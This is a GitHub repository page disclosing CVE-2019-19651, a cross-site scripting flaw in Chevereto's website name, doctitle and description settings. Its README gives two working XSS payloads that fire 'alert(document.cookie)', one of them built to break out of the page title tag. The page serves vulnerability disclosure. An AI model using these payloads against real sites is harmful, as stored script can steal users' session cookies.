Skip to content
/ CVE-2019-19651 Public

Chevereto reflected XSS in Website Name - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core

2 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

jra89/CVE-2019-19651

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 
xss-1.png
xss-1.png
 
 

Repository files navigation

CVE-2019-19651

Chevereto reflected XSS in Website Name, doctitle, and description - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core

Dashboard -> Settings -> Website name, Website doctitle, Website description

Putting this in will reflect on the whole site for all the users

">Chevt<img src=x onerror=alert(document.cookie)><"

It will reflect on different parts of the site, so if you want it to execute after <title> in the header you can do

Chevereto</title>Chevt<img src=x onerror=alert(document.cookie)><title>

About

Chevereto reflected XSS in Website Name - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published